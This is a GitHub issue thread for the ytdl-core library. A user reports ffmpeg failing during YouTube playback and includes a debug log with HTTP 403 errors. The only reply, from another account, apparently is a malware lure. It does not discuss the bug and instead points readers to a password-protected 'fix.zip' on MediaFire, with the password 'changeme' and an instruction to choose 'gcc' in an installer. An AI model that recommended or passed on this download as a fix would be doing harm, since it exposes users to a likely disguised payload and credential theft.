### ISSUE TITLE
DisTubeError [FFMPEG_EXITED]: ffmpeg exited with code 3436169992 only while playing on youtube platform 

### ISSUE THREAD

**Issue by Tarekthedeveloper** [distubejs/ytdl-core#101]
## Describe the bug
 When playing music using youtube platform it play normally around 10h then the ffmpeg say that it exited with code 3436169992
but when using another platform like soundcloud,spotify,deezer the bot play normally . 

## Debug File
--FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: size= 22608KiB time=00:02:00.76 bitrate=1533.6kbits/s speed=1.01x
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [tls @ 000002cb85936d80] Error in the pull function.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [tls @ 000002cb85936d80] IO error: Error number -10054 occurred
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [https @ 000002cb85932ac0] Will reconnect at 2064384 in 0 second(s), error=Error number -10054 occurred.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [https @ 000002cb85932ac0] HTTP error 403 Forbidden
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [tls @ 000002cb85936d80] The specified session has been invalidated for some reason.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [https @ 000002cb85932ac0] Will reconnect at 2064384 in 1 second(s), error=I/O error.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: size= 22743KiB time=00:02:01.34 bitrate=1535.4kbits/s speed=1.01x
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: size= 22746KiB time=00:02:01.34 bitrate=1535.7kbits/s speed=1.01x
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [https @ 000002cb85932ac0] HTTP error 403 Forbidden
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [tls @ 000002cb85936d80] The specified session has been invalidated for some reason.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: [https @ 000002cb85932ac0] Will reconnect at 2064384 in 3 second(s), error=I/O error.
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: size= 22746KiB time=00:02:01.34 bitrate=1535.7kbits/s speed=1.01x
FFMPEG_DEBUG: [1267535651541090305] [ffmpeg] log: size= 22746KiB time=00:02:01.34 bitrate=1535.7kbits/s speed= 1x
FFMPEG_DEBUG: [1267535651541090305] [stream] error: Premature close
FFMPEG_DEBUG: [1267535651541090305] [process] exit: code=unknown signal=SIGKILL. 

## Environment

- @distube/ytdl-core version: 4.14.4
- Node.js version: 18.20.4
- Operating system: windows server 2022

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
